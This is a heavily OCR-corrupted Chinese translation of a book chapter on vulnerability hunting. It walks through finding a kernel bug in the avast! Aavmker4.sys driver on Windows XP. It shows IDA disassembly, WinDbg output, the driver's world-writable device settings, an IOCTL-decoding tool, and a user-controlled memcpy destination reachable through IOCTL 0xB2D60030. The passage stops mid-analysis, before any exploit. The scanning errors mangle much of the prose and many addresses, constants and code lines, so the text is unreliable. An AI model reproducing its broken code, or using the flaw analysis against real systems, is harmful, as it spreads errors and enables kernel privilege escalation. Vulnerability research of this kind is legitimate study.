化 了 些 时 间 检 查 开源 内 核 ， 发 现 几 个 有 趣 的 bug 之 后 ， 我 想 知 道 目 己 是 否 能 
发 现 微软 Windows 操作 系统 驱动 程序 中 的 bug. Windows 有 很 多 现成 的 第 三 方 驱 
动 ， 想 挑 出 几 个 好 利用 的 不 太 容 易 。 最 后 我 选择 了 几 球 防 病 毒 产 品 ， 因 为 它们 遂 
HA tr BW Abe, 我 访问 了 VirusTotal 网 站 四， 从 列表 中 选择 我 所 知道 的 
第 一 款 防 病毒 产品 : ALWIL Software 的 avast!!! 2010 年 6 月， 日 ALWIL 
事实 证 明 ， 这 个 偶然 的 决定 市 来 了 意外 的 发 现 。 Software 8 名 为 AVAST Software. 

















6.1. A Es 


c S (B ux ^ dada g 


发 现 这 个 漏洞 的 步骤 如 下 。 of) avast! d UL ER 4.7 支持 的 所 
O 第 一 步 : 为 内 核 调 试 准备 一 个 VMware 客 有 微软 Windows 平台 . 本 音 里 
PL. 我 用 的 平台 是 32 位 Windows 


a 第 二 步 :生成 一 个 avast! 创 建 的 驱动 和 设备 —OXP SP? EAU Re 
对 象 列表 。 
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口 第 三 步 : 检查 设备 的 安全 设置 。 

O 第 四 步 : 列 出 IOCTL. 

D 第 五 步 : 找 出 用 户 控制 的 输入 数据 。 
O 第 六 步 : 道 向 工程 IOCTL 处 理 程序 。 


6.1.1 第 一 步 : 为 内 核 调 试 准备 一 个 VMware 客户 机 


首先 ， 我 创建 了 一 个 Windows XP VMware 客户 机 系统 ， 使 用 WinDbg 配置 
远程 内 核 调试 中 。B.3 节 介 绍 了 必要 的 步骤 。 


6.1.2 第 二 步 : 生成 一 个 avast! 创 建 的 驱动 和 设备 对 象 列表 


在 VMware 客户 机 系统 中 下 载 安 装 avast! 专 业 版 着 的 最 新 版 本 之 后 ， 用 
DriverView “生成 一 个 avast! 加 载 的 驱动 程序 列表 。 

DriverView 的 好 处 之 一 是 它 让 识别 第 三 方 驱动 变 得 容易 了 。 如 图 6-1 Ata, 
avast! 加 载 了 4 个 驱动 程序 。 我 选择 列表 中 的 第 一 个 , Aavmker4.sys, 用 IDA Pro f 
生成 这 个 驱动 程序 的 设备 对 和 象 列表 。 


注意 ”了 驱动 程序 可 以 在 任何 时 候 通 过 调用 IoCreateDevice 或 者 IoCreateDeviceSecure"! 
创建 设备 对 象 来 表示 设备 或 驱动 程序 的 接口 。 


Ss DriverView 
File Edit View Help 


EJ [2] Sa ES" 2) I 








Driver Name Address File Type Description Version Company Product Name 
e EWI EL Oxf 7o4do00 System Driver avast! Base Kernel-Mode Devic... ALWIL Software avast! Antivirus Systern 


@ aswMon2.SYS Oxee921000 System Driver avast! File System Filter Driver,,, 4.7.1098,.0 ALWIL Software avast! Antivirus System 
Q* aswRdr.SvYs Üxee3a1000 Network Driver ^ avast! TDI RDR Driver 4,7,1098,0 ALWIL Software ^ avast! Antivirus System 
Q^ aswTdi.SYs üxFze4doon Network Driver ^ avast! TDI Filter Driver 4.7,1098.0 ALWIL Software ^ avast! Antivirus System 
€. | | >| 


124 item(s), 1 Selected 





图 6-1 DriverView 中 avast! 加 载 的 驱动 列表 


IDA 反 汇 编 这 个 驱动 程序 后 , 我 开始 审读 驱动 初始 化 例 程 DriverEntry() 的 汇 
Av, Uo 


.text:000105D2 ; const WCHAR aDeviceAavmker4 
.text:000105D2 aDeviceAavmker4: ; DATA XREF: DriverEntry+12 
. text:000105D2 unicode 0, <\Device\AavmKer4> , 0 
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[ 
.text:00010620 ; NTSTATUS  stdcall DriverEntry(PDRIVER OBJECT DriverObject, 一 
PUNICODE STRING RegistryPath) 


. text : 00010620 public DriverEntry 

.text:00010620 DriverEntry proc near 

. text: 00010620 

.text:00010620 SymbolicLinkName= UNICODE STRING ptr -14h 

.text:00010620 DestinationString= UNICODE STRING ptr -oCh 

.text:00010620 DeviceObject - dword ptr -4 

.text:00010620 DriverObject - dword ptr 8 

.text:00010620 RegistryPath = dword ptr oCh 

.text:00010620 

. text : 00010620 push ebp 

. text :00010621 mov ebp, esp 

. text: 00010623 sub esp, 14h 

. text :00010626 push ebx 

. text : 00010627 push esi 

. text : 00010628 mov esi, ds:RtlInitUnicodeString 

. text :0001062E push edi 

. text :0001062F lea eax, [ebp+DestinationString | 

. text : 00010632 push offset aDeviceAavmker4 ; SourceString 
. text : 00010637 push eax ; DestinationString 
. text : 00010638 call esi ; RtlInitUnicodeString 

. text :0001063A mov edi, [ebpsDriverObject | 

. text :0001063D lea eax, [ebp4DeviceObject | 

. text: 00010640 XOr ebx, ebx 

. text :00010642 push eax ; DeviceObject 

. text: 00010643 push ebx ; Exclusive 

. text :00010644 push ebx ; DeviceCharacteristics 
. text :00010645 lea eax, [ebpsDestinationString] 

. text :00010648 push 22h ; DeviceType 

. text :0001064A push eax ; DeviceName 

. text :0001064B push ebx ; DeviceExtensionSize 
. text :0001064C push edi ; DriverObject 

. text :0001064D call ds: IoCreateDevice 

. text : 00010653 cmp eax, ebx 

. text: 00010655 jl loc 1075E 


[..] 


在 DriverEntry()PR ZA HL, Jii. text:0001064D AI] PR. IoCreateDevice() 创 
建 了 一 个 名 叫 \Device\AavmKer4 的 设备 ( Ub. text:00010632 All. text:000105D2 )。 
以 上 给 出 的 DriverEntry() 汇 编 代码 片段 可 翻译 成 如 下 的 C 代码。 


[..] 
RtlInitUnicodeString (&DestinationString, &L"\\Device\\AavmKer4") ; 
retval = IoCreateDevice (DriverObject, 0, &DestinationString, 0x22, 0, 0, 8DeviceObject); 


[..] 


6.1.3 第 三 步 : 检查 设备 的 安全 设置 


然后 用 WinObj 检查 AavmKer4 设备 的 安全 设置 ( 见 图 6-2 ), D 
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IX nO - Sysinternals: www.;sysinternals.com 
File View Help 


“| 
SE rbavmkerd 
£82 AcAdapterl Device 
asard Device 


[5g ArcMame 
国 : Baselamedobjecks 
|) Callback 


E (23 BmCantrol 
23] HarddiskB 
* i HarddiskDrmvolumes 


182 ASWRDR Device 

Soe AsiRdrTcpFilter Device 

SF AswTcprilter Device 

Oe ASWTDI Device 

182 AswLIdpFilter Device 

E winDfs fo Beep Device 

EE Driver 8$ CdRamÜ Device 

H: Eg FileSystern foe CompositeBattery Device 

- EJ GLOBAL?? E - E Device 
w| ll E || 


\Device\aavmker4 


| 
S Device = | f8$ aswilon Device 
| 








图 6-2 WinObj 中 AavmKer4 设备 的 安全 设置 导航 


要 在 WinObj 中 查看 设备 的 安全 设置 ， 碳 键 单 击 设备 名 ， 从 选项 列表 中 选择 
Properties， 然 后 选择 Security 标签 。 设 备 对 象 允 许 系 统 每 个 用 户 (Everyone 组 ) 
读 写 该 设备 ( 见 图 6-3) 这 意味 着 系统 的 每 个 用 户 向 驱动 程序 实现 的 IOCTL 发 送 
数据 都 是 允许 的 ， 这 很 重要 ， 它 使 得 驱动 程序 成 为 一 个 有 价值 的 目标 ! 








Aavmker4 Properties 


| Details | Security 


Group ar user names: 
e Administrators [BHD SA&drministratorz] 
em Evermore 
ET; RESTRICTED 
T; SYSTEM 


Permissions for Everone Alloy Dery 
Read 
Write 
Delete 
Special Permissions 


For special permissions or for advanced settings. 
click Advanced. 





图 6-3 ”查看 \Device\AavmKer4 的 安全 设置 
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6.1.4 ”第 四 步 : 列 出 IOCTL 


要 向 内 核 驱 动 发 送 IOCTL ，Windows 用 户 空 间 应 用 程序 必须 调用 
DeviceIoControl()。 这 些 对 DeviceIoControl() 的 调用 导致 Windows 的 UO 管理 可 
生成 一 个 IRP. MJ DEVICE CONTROL 请 求 , 发 送 给 最 顶层 驱 动 程序 。 驱动 程序 实现 一 
个 特殊 的 调度 例 程 来 处 理 IRP MJ DEVICE CONTROL 请 求 ， 而 这 个 调度 例 程 被 一 个 
MajorFunction[] 数 组 引用 。 这 个 数组 是 DRIVER OBJECT 数据 结构 的 成 员 ， 此 结构 
体 可 在 WDK ( Windows Driver Kit ) ^f ntddk.h 中 找到 。 为 节省 篇 幅 ， 我 删 掉 了 
代码 里 的 注释 。 


[..] 
typedef struct DRIVER OBJECT { 
CSHORT Type; 
CSHORT Size; 
PDEVICE OBJECT DeviceObject; 
ULONG Flags; 
PVOID DriverStart; 
ULONG DriverSize; 
PVOID DriverSection; 


DNRPTVER FEYTENGCTON Driver rE 


I VAN LNILIVWJILVIN LZLJLVWJ 


UNICODE STRING DriverName; 

PUNICODE STRING HardwareDatabase; 

PFAST IO DISPATCH FastIoDispatch; 

PDRIVER INITIALIZE DriverInit; 

PDRIVER STARTIO DriverStartIo; 

PDRIVER UNLOAD DriverUnload; 

PDRIVER DISPATCH MajorFunction[IRP MJ MAXIMUM FUNCTION + il: 
} DRIVER OBJECT; 


[..] 
以 下 是 MajorFunction|[ ]avZH cA ME X. (BÆ A ntddk.h )。 








[..] 


#define IRP MJ CREATE 0x00 
#define IRP MJ CREATE NAMED PIPE 0x01 
#define IRP MJ CLOSE 0x02 
#define IRP MJ READ 0x03 
#define IRP M WRITE 0x04 
#define IRP M QUERY INFORMATION 0x05 
#define IRP MJ SET INFORMATION 0x06 
#define IRP MJ QUERY EA 0x07 
#define IRP MJ SET EA 0x08 
#define IRP M _FLUSH BUFFERS 0x09 


#define IRP MJ QUERY - VOLUME INFORMATION OxOa 
#define IRP MJ _9ET VOLUME INFORMATION Oxob 


#define IRP MJ DIRECTORY CONTROL OxOc 
define IRP MJ FILE SYSTEM - CONTROL Ox0d 
#define IRP MJ _DEVICE | CONTROL Ox0e 


#define IRP MI INTERNAL DEVICE CONTROL Oxof 
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#define 
ttdefine 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 


[ 
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IRP MJ SHUTDOWN 
IRP MJ LOCK CONTROL 

IRP MJ CLEANUP 

IRP MJ CREATE MAILSLOT 
IRP MJ QUERY SECURITY 
IRP MJ SET SECURITY 

IRP MJ POWER 

IRP MJ SYSTEM CONTROL 
IRP MJ DEVICE CHANGE 
IRP MJ QUERY QUOTA 

IRP MJ SET QUOTA 

IRP MJ PNP 

IRP MJ PNP POWER 

IRP MJ MAXIMUM FUNCTION 


0x10 
0x11 
0x12 
0x13 
Ox14 
0x15 
0x16 
0x17 
0x18 
0x19 
0x1a 
Ox1b 


IRP MJ PNP 


Ox1b 


为 了 列 出 驱动 程序 实现 的 IOCTL ， 我 必须 找到 这 个 驱动 的 IOCTL 调度 例 程 。 
如 果 我 可 以 得 到 驱动 的 C 人 代码 ， 这 就 容易 了 ， 因 为 我 知道 调度 例 程 的 任务 分 配 通 
TAEA NET o 








DriverObject-»MajorFunction|IRP MJ DEVICE CONTROL] = IOCTL dispatch routine; 


很 遗憾 , 我 拿 不 到 avast! 的 Aavmker4.sys 驱动 程序 源 代 码 。 怎 样 才能 仅 用 IDA 
Pro 提供 的 反 汇 编码 找到 具体 的 任务 分 配 呢 ? 
为 解答 这 个 问题 ， 我 需要 获取 DRIVER OBJECT 数据 结构 有 关 的 更 多 信息 。 我 
把 idis. 附加 到 VMware 客户 机 系统 上 , 用 dt 命令 ( 以 下 调试 命令 的 详细 描述 
WL B.2 节 ) 显示 所 能 得 到 的 结构 体 信息 。 


kd» .sympath SRV*c:\WinDBGSymbols*http://msdl.microsoft.com/download/symbols 
kd» .reload 








[ 

kd» dt -v DRIVER OBJECT . 

nt! DRIVER OBJECT 

struct DRIVER OBJECT, 15 elements, Oxa8 bytes 


+0x000 Type : Int2B 

+0x002 Size : Int2B 

+0x004 DeviceObject : 

+0x008 Flags : Uint4B 

+0x00c DriverStart : 

+0x010 DriverSize : Uint4B 

+0x014 DriverSection i 

+0x018 DriverExtension : 

+0x01c DriverName : struct UNICODE STRING, 3 elements, 0x8 bytes 
+0x000 Length : Uint2B 
+0x002 MaximumLength : Uint2B 


+0x004 Buffer : Ptr32 to Uint2B 
+0x024 HardwareDatabase : 
+0x028 FastIoDispatch 


+0x02c DriverInit 
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+0x030 DriverStartlo 
+0x034 DriverUnload 
+0x038 MajorFunction : [28] 


Ji ias Fag bz MajorFunction[]ZXZH A Z5 Tg 0x38 处 开始 。 看 了 
WDK 的 ntddk.h 头 文件 后 ， 我 知道 了 IRP MJ DEVICE CONTROL 在 MajorFunction[] 
中 位 于 偏 移 oxoe 处 ， 而 且 数 组 元 素 的 太 才 是 一 个 指针 的 大 小 〈32 位 平台 上 的 4 
Fe 

因此 ， 这 个 分 派 可 用 以 下 方式 表示 。 


In C: DriverObject->MajorFunction[IRP MJ DEVICE CONTROL] 
Offsets : DriverObject + 0x38 + Ox0e * 4 
Simplified form : DriverObject + 0x70 








IOCTL dispatch routine; 
IOCTL dispatch routine; 
IOCTL dispatch routine; 


有 无 数 方法 可 以 表示 这 个 Intel 汇编 的 任务 分 派 ， 但 是 我 在 avast! KIEA 
但 里 找到 的 是 下 面 这 些 指令 。 
bs] 


. text :00010748 mov eax, [ebpsDriverObject | 


. text: 00010750 mov dword ptr [eax+70h], offset sub 1098C 


在 地 址 .text:00010748 处 , 一 个 指向 DRIVER OBJECT 的 指针 保存 在 EAX 寄存 器 中 。 
在 地 址 .text:00010750 处 ，IOCTL JAREMA KAS IRS J MajorFunction[IRP MJ 
_DEVICE CONTROL]. 


Assignment in C: DriverObject-»MajorFunction|IRP MJ DEVICE CONTROL | 
Offsets : DriverObject + 0x70 


sub 1098c; 
sub 1098c; 


最 后 我 找到 了 这 个 驱动 程序 的 IOCTL 调度 例 程 : sub 1098C! 借助 调试 器 ， 也 
可 以 找到 IOCTL 调度 例 程 。 


kd» !drvobj AavmKer4 7 
Driver object (86444138) is for: 
*** ERROR: Symbol file could not be found. Defaulted to export symbols for 
Aavmker4.SYS - 
\Driver\Aavinker4 
Driver Extension List: (id , addr) 


Device Object list: 
863a9150 


DriverEntry: 792d620 Aavmker4 
DriverStartIo: 00000000 
DriverUnload: 00000000 
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AddDevice: 00000000 


Dispatch routines: 


[00] IRP MJ CREATE f7924766 Aavmker440x766 
[01] IRP MJ CREATE NAMED PIPE £792d766 Aavmker4+0x766 
[02] IRP MJ CLOSE f792d766 Aavmker4+0x766 
[03] IRP MJ READ 17924766 Aavmker4+0x766 
[04] IRP MJ WRITE £792d766 Aavmker4+0x766 
[05] IRP MJ QUERY INFORMATION f792d766 Aavmker4+0x766 
[06] IRP MJ SET INFORMATION £792d766 Aavmker4+0x766 
[07] IRP_MJ QUERY EA f7924766 Aavmker4+0x7 66 
[08] IRP_MJ SET EA f7924766 Aavmker4+0x766 
[09] IRP MJ FLUSH BUFFERS £792d766 Aavmker4+0x766 
[0a] IRP MJ QUERY VOLUME INFORMATION  f792d766 Aavmker440x766 
[ob] IRP MJ SET VOLUME INFORMATION £792d766 Aavmker440x766 
[0c] IRP MJ DIRECTORY CONTROL £792d766 Aavmker4+0x766 
[od] IRP MJ FILE SYSTEM CONTROL £792d766 Aavmker4+0x766 
[0e] IRP MJ DEVICE CONTROL f792d98c Aavmker4+0x98c 
[..] 


WinDbg 的 输出 显示 可 以 在 地 址 Aavmker4+0x98c 处 找到 IRP MJ DEVICE CONTROL 


调度 例 程 。 


找到 这 个 调度 例 程 后 ,我 在 这 个 函数 里 搜索 实现 的 IOCTL。IOCTL 调度 例 程 


的 原型 如 下 。 


NTSTATUS 
DispatchDeviceControl( 


. in struct DEVICE OBJECT P*DeviceObject, 


. in struct IRP *Irp 


) 
NE 


PRA TBA P48 ln] LO 请 求 数据 包 ( IRP ) 结构 的 指针 。IRP 是 
Windows I/O 管理 硕 用 来 和 驱动 程序 通信 并 允许 驱动 程序 之 间 通 信 的 基本 结构 体 。 
这 个 结构 体 传输 用 户 提 供 的 IOCTL 数据 以 及 IOCTL 请 求 编 号 。 呈 1 

然后 ， 为 产生 一 个 IOCTL 的 列表 ， 我 查看 了 这 个 调度 例 程 的 反 汇 编码 。 








[..] 

.text:0001098C ; int stdcall sub 1098C(int, PIRP Irp) 
.text:0001098C sub 1098C proc near 

ry 

Lee] 

. text: 000109B2 mov 
. text: 000109B5 mov 


; DATA XREF: DriverEntry+130 


ebx, [ebp+Irp] 
eax, [ebx+60h] 


; ebx = address of IRP 


IOCTL 调度 例 程 的 地 址 .text:000109B2 处 ， 一 个 指向 IRP 结构 体 的 指针 保存 
在 了 EBX 寄存 器 中 。 之 后 ， 位 于 IRP 结构 体 偏 移 0x60 处 的 一 个 值 被 引用 
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( 见 .text:000109B5 )。 


kd» dt -v -r 3 IRP 

nt! IRP 

struct IRP, 21 E gu oe 
+0x000 Type 


A^ 区 


+0x002 Size po 
+0x004 MdlAddress A co. 
+0x008 Flags : 17 
[ 
+0x040 Tail : union  unnamed, 3 elements, 0x30 bytes 
+0x000 Overlay : struct unnamed, 8 elements, 0x28 bytes 
+0x000 DeviceQueueEntry : struct KDEVICE QUEUE ENTRY, 3 elements, 0x10 bytes 
+0x000 DriverContext ; [4] 2?77 
+0x010 Thread i 10207 
+0x014 AuxiliaryBuffer : ???? 
+0x018 ListEntry : struct LIST ENTRY, 2 elements, Ox8 bytes 





WinDbg 的 输出 显示 ，IRP 结构 体 成 员 CurrentStackLocation 位 于 偏 移 0x60 
处 。 这 个 结构 体 定义 于 Windows 驱动 程序 开发 包 ( WDK ) 的 ntddk.h 中 。 


[..] 

// 

// 1/0 Request Packet (IRP) definition 
{7 

typadef struct _IRP { 


// 

// Current stack location - contains a pointer to the current 
// IO STACK LOCATION structure in the IRP stack. This field 
// should never be directly accessed by drivers. They should 
// use the standard functions. 

// 


struct IO STACK LOCATION *CurrentStackLocation; 


以 下 代码 显示 了 IO STACK LOCATION 结构 体 的 布局 ( 见 WDK 的 ntddk.h )。 


[ 

typedef struct IO STACK LOCATION { 
UCHAR MajorFunction; 
UCHAR MinorFunction; 
UCHAR Flags; 


UCHAR Control; 


// Note that the user's output buffer is stored in the 
// UserBuffer field 
// and the user's input buffer is stored in the SystemBuffer 
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// field. 
ii 


struct { 
ULONG OutputBufferLength; 
ULONG POINTER_ALIGNMENT InputBufferLength; 
ULONG POINTER ALIGNMENT IoControlCode; 
PVOID Type3InputBuffer; 

} DeviceloControl; 


除了 IOCTL 请 求 的 IoControlCode， 这 个 结构 体 还 包含 输入 输出 缓冲 区 的 大 
小 信息 。 现 在 我 有 了 更 多 关于 IO STACK LOCATION 结构 体 的 信息 ， 再 次 查看 反 汇 
编码 。 





.text:0001098C ; int | stdcall sub 1098C(int, PIRP Irp) 


.text:0001098C sub 1098C proc near ; DATA XREF: DriverEntry+130 
[..] 

. text :000109B2 mov ebx, [ebp+Irp] ; ebx = address of IRP 

. text:000109B5 mov eax, [ebx+60h] ; eax = address of CurrentStackLocation 
. text: 000109B8 mov esi, [eax+8] ; ULONG InputBufferLength 

. text : 000109BB mov [ebp+var 1C], esi ; save InputBufferLength in var 1C 

. text:000109BE mov edx, [eax+4] ; ULONG OutputBufferLength 

. text: 000109C1 mov [ebp+var 3C], edx ; save OutputBufferLength in var 3C 

. text:000109C4 mov eax, [eax+0Ch] ; ULONG IoControlCode 

. text:000109C7 Inov ecx, OB2D6002Ch ; ecx = OxB2D6002C 

. text:000109CC cmp eax, ecx ; compare OxB2D6002C with IoControlCode 
. text: 000109CE ja loc 10D15 


之 前 提 到 过 ， 在 地 址 .text:000109B5 Lb, —A $f m] IO STACK LOCATION 的 指 
针 保存 到 EAX 寄存 种 ， 然 后 ， 在 地 址 .text:000109B8 处 ，InputBufferLength 保存 
到 ESI ATAF o 在 地 址 .text:000109BE 人 处, OutPutBufferLength ee EDX a 
器 中 , 在 地 址 .text:000109C4 Xb, IoControlCode 保存 在 EAX 寄存 器 中 。 ，EAX 
中 保存 的 IOCTL 请 求 编号 和 值 0xB2D6002C 比较 (见地 址 .text:000109C7 
和 .text:000109CC Ab), Mi, EREI f IKE PA - IOCTL 代码 ! 我 在 
函数 里 搜索 所 有 与 保存 在 EAX 中 的 IOCTL 请 求 编号 进行 比较 的 值 ， 得 到 一 份 
Aavmker4.sys 支持 的 IOCTL 列表 。 


6.1.5 ”第 五 步 : 找 出 用 尸 控制 的 输入 数据 


得 到 驱动 支持 的 IOCTL 列表 后 ， 我 尝试 定位 包含 用 户 提 供 的 IOCTL 输入 数 
据 的 缓冲 区 。 所 有 IRP MJ DEVICE CONTROL 请 求 都 同时 提供 输入 缓冲 区 和 输出 绥 冲 
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区 。 系 统 描述 这 些 缓冲 区 的 方式 依赖 于 数据 传输 类 型 。 传 输 类 型 保存 在 IOCTL fX 
码 中 ,在 微软 Windows 中 ,IOCTL 代码 值 通常 由 CTL_CODE 宏 生成 。 ”下面 是 ntddk.h 
的 万 一 段 代 码 。 

[..] 

H 

// Macro definition for defining IOCTL and FSCTL function control codes. Note 


// that function codes 0-2047 are reserved for Microsoft Corporation, and 
// 2048-4095 are reserved for customers. 


// 

#define CTL_CODE( DeviceType, Function, Method, Access ) ( \ 
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \ 

) 

[-.] 

// 


// Define the method codes for how buffers are passed for I/O and FS controls 
// 


#define METHOD BUFFERED 
#define METHOD IN DIRECT 
#define METHOD OUT DIRECT 
#define METHOD NEITHER 

[ 


WN RF O 





传输 类 型 通过 CTL CODE KAY Method 参数 具体 指定 。 我 写 了 一 个 小 工具 来 查 出 
Aavmker4.sys 的 IOCTL 使 用 的 是 哪 种 数据 传输 类 型 。 


代码 清单 6-1 用 来 查 出 Aavmker4.sys 的 IOCTL 是 用 哪 种 数据 传输 类 型 的 小 工 
H. (IOCTL method.c ) 


01 include «windows.h» 
02 #include <stdio.h> 


03 

04 int 

05 main (int argc, char *argv[]) 

06 { 

07 unsigned int method = 0; 

08 unsigned int code s 

09 

10 if (argc != 2) 1 

11 fprintf (stderr, "Usage: %s «IOCTL code>\n", argv[0]); 
12 return 1; 

13 } 

14 

15 code = strtoul (argv[1], (char **) NULL, 16); 
16 method = code & 3; 

17 


18 switch (method) { 
19 case 0: 
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20 printf ("METHOD BUFFERED\n"); 
21 break; 

22 case 1: 

23 printf ("METHOD IN DIRECT\n"); 
24 break; 

25 case 2: 

26 printf ("METHOD OUT DIRECT\n"); 
27 break; 

28 case 3: 

29 printf ("METHOD NEITHER\n"); 

30 break; 

31 default: 

32 fprintf (stderr, "ERROR: invalid IOCTL data transfer method\n"); 
33 break; 

34 } 

35 

36 return O0; 

37 ] 


然后 用 Visual Studio 的 命令 行 C 编译 器 (cl) 编译 这 个 工具 。 


C:\BHD>cl /nologo IOCTL method.c 
IOCTL method.c 


以 下 输出 显示 代码 清单 6-1 这 个 工具 的 实际 行为 。 


C: NBHD»IOCTL method.exe B2D6002C 
METHOD BUFFERED 





可 见 , 驱动 程序 用 传输 类 型 METHODD BUFFERED 描述 一 个 IOCTL 请 求 的 输入 输 
出 缓冲 区 。 根 据 WDK 中 的 缓冲 区 描述 ， 对 于 使 用 METHOD BUFFERED 传输 类 型 的 
IOCTL, ， 其 输入 缓冲 区 可 在 Irp-»AssociatedIrp.SystemBuffer 中 找到 。 

下 面 是 Aavmker4.sys 反 汇 编码 中 一 个 引用 输入 缓冲 区 的 例子 。 


. text : 00010CF1 mov eax, [ebx«OoCh] ; ebx = address of IRP 
. text: 00010CF4 mov eax, [eax] 


这 个 例子 中 , EBX 包含 一 个 指 问 IRP 结构 体 的 指针 。 地 址 .text:00010CF1 处 引 
用 了 IRP 254) 14% 0x0C 处 的 成 员 。 


kd» dt -v -r 2 IRP 

nt! IRP 

struct IRP, 21 elements, 0x70 bytes 
+0x000 Type : 27 


+0x002 Size > o2? 

+0x004 MdlAddress 3 000. 

+0x008 Flags E 

+0x00c AssociatedIrp : union  unnamed, 3 elements, Ox4 bytes 


+0x000 MasterIrp Loro 
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+0x000 IrpCount : ?? 
+0x000 SystemBuffer : 2222 


[..] 

WinDbg 的 输出 显示 , 位 于 这 个 偶 移 位 置 的 是 AssociatedIrp CIRP-»AssociatedIrp), 
在 地 址 .text:00010CF4 处 ，IOCTL 调用 的 输入 缓冲 区 被 引用 并 保存 在 EAX 中 
( Irp-»AssociatedIrp.SystemBuffer )。 既 然 已 经 找到 驱动 支持 的 IOCTL 以 及 
IOCTL 的 输入 数据 ， 我 就 开始 搜寻 bug 了 。 








6.1.6 ”第 六 步 : 逆向 工程 IOCTL 处 理 程 序 


为 了 找到 淤 在 的 安全 缺陷 , 在 一 次 跟踪 输入 数据 时 我 检查 了 一 个 IOCTL 处 理 
程序 的 代码 。 当 无 意 中 遇 到 IOCTL 码 oxB2D60030 时 ,我 找到 了 一 个 很 微妙 的 bug。 
如 果 一 个 用 户 空间 应 用 请 求 IOCTL fi 0xB2D60030， 以 下 代码 会 执行 。 





[sa 
.text:0001098C ; int stdcall sub 1098C(int, PIRP Irp) 


.text:0001098C sub 1098C proc near ; DATA XREF: DriverEntry+130 
.text:00010D28 cmp eax, 0B2D60030h ; IOCTL-Code == 0xB2D60030 ? 


. text :00010D2D jz short loc_10DAB ; if so -> loc_10DAB 





如 果 请 求 的 IOCTL 码 等 于 oxB2D60030( Jil, text :00010D28 ), Hitt. text :00010DAB 
处 的 汇编 代码 (loc 10DAB) 执行 。 


. text :000109B8 mov esi, [eax48] ; ULONG InputBufferLength 

. text: 000109BB mov [ebp+var_1C], esi 

[|] 

Lowe J 

.text:00010DAB loc 10DAB: ; CODE XREF: sub 1098C+3A1 

. text:00010DAB xor edi, edi ; EDI = 0 

. text : 00010DAD cmp byte 1240C, O 

. text: 00010DB4 jz short loc 10DC9 

[..] 

.text:00010DC9 loc 10DC9: ; CODE XREF: sub 1098C4428 

. text:00010DC9 mov esi, [ebx«oCh] ; Ixp-»AssociatedIrp.SystemBuffer 
. text: 00010DCC cmp [ebp+var_1C], 878h ; input data length == 0x878 ? 
. text :00010DD3 ]z short loc 10DDF ; if so -» loc 10DDF 


地 址 .text:00010DAB 处 置 EDI 为 0。EBX 寄存 器 包含 一 个 指向 IRP 结构 体 的 指 
fF, 并 且 在 地 址 .text:00010DC9 处 ,一 个 指 回 输入 缓冲 区 数据 的 指针 保存 在 了 ESI 
rH ( Irp-»AssociatedIrp.SystemBuffer ); 
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在 调度 例 程 的 开始 部 分 ， 请 求 的 InputBufferLength 保存 在 栈 变 量 var 1c 中 
( 见 .text:000109BB )。 地 址 .text:00010DCC 处 输入 数据 的 长 度 和 信 0x878 做 比较 
( 见 图 6-4 )。 


666169B8 mov esi, [eax*8] ; ULONG InputBufferLength 
888189BB mou [ebp*var 16], esi 

8881809BE mov edx, [eax*h] ; ULONG QutputBufferLength 
666169C1 mou [ebp*var 36], edx 

666169C4 mou eax, [eax*«BCh] ; ULONG IoControlCode 
8881897 mou ecx, §B2D6662Ch 

666169CC cmp eax, ecx 

888189CE ja loc 18D15 


FAN HA | 
not relevant — | 


66616D28 cmp eax, BB2D68838n ; IOCTL-Code == 80xB2D6808038 ? 
88818D2D jz short loc 16DAB ; if so -> loc 16DAB 





byte 1248C, A 
88818DBA^ jz short loc 18bt9 





66616DC9 mov esi, [ebxe«üCn] ; Irp->AssociatedIrp.SystemBuffer 
88818DCC cmp [ebp+uar 16], 878h ; input data length == 8x878 ? 
00010003 jz short loc 18DDF ; if so -> loc 18DDF 

er 











图 6-4 IDA Pro 中 的 漏洞 代码 路 径 示 意图 ， 第 1 部 分 


如 朱 数 据 长 度 等 于 0x878， 则 会 进一步 处 理 ESI 指 回 的 用 户 控 制 输入 数据 。 


.text:00010DDF loc 10DDF: ; CODE XREF: sub 1098C+447 

. text: 00010DDF mov [ebp+var 4], edi 

. text:00010DE2 cmp [esi], edi ; ESI -- input data 

. text :00010DE4 jz short loc 10E34 ; if input data == NULL -> loc 10E34 

[..] 

.text:00010DE6 mov eax, [esi+870h]  ; ESI and EAX are pointing to the — 
input data 

. text:00010DEC mov X [ebp+var 48], eax ; a pointer to user controlled data 一 
is stored in var 48 

. text: 00010DEF cmp dword ptr [eax], ODODEADO7h ; validation of input data 

. text: 00010DF5 jnz short loc 10E00 

[..] 

.text:00010DF7 cmp dword ptr [eax+4], 10BADOBAh ; validation of input data 

. text :00010DFE jz short loc 10E06 


地 址 .text:00010DE2 处 的 代码 检查 输入 数据 是 否 等 于 NULL。 如 果 是 NULL 
就 从 数据 [user data+0x870] 处 提取 一 个 指针 保存 在 EAX 中 ( 见 .text:00010DE6 ). 
这 一 指针 值 保 存 到 栈 变 量 var 48 中 ( 见 .text:00010DEC )。 然 后 程序 检查 EAX 指向 的 
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数据 是 否 以 0xDODEAD07 或 者 0x10BADOBA 开头 ( 见 .text:00010DEF 及 .text:00010DF7 )。 
是 的 话 ， 就 继续 解析 输入 数据 。 


[ 

.text:00010E06 loc 10E06: ; CODE XREF: sub 1098C4472 
. text : 00010E06 XOr edx, edx 

. text :00010E08 mov eax, [ebptvar 48] 

. text :00010E0B mov [eax], edx 

. text : 00010E0D mov [eaxt+4], edx 

. text:00010E10 add esi, 4 ; source address 

. text: 00010E13 mov ecx, 21Ah ; length 

. text:00010E18 mov edi, [eax+18h] ; destination address 
. text: 00010E1B rep movsd ; memcpy() 

[..] 


地 址 .text:00010E1B 处 的 rep movsd 指令 表示 一 个 memcpy() PKL. ATLA ESI 
包含 源 地 址 ，EDI 包含 目标 地 址 ，ECX 包含 复制 的 数据 长 度 。ECX 赋值 为 0x21a 
( 见 .text:00010E13 ), ESI 指向 用 户 控制 的 IOCTL 数据 ( 见 .text:00010E10 ), EDI 
也 来 目 EAX 指 回 的 用 户 控制 数据 〈 见 .text:00010E18 以 及 图 6-5 )。 





[esi], edi ; ESI == input data 
short loc 18E3^4 ; if input data == NULL -> loc 18E35 


G6616DE6 mou eax, [esis378n] ; ESI and EAX are pointing to the input data 
866018DEC mou [ebp*var 48], eax ; a pointer to user controlled data is stored in var ^8 


BPB1BDEF cmp dword ptr [eax], SDGDEADG7h ; validation of input data 
BEB18DF5 jnz short loc 18EB88 


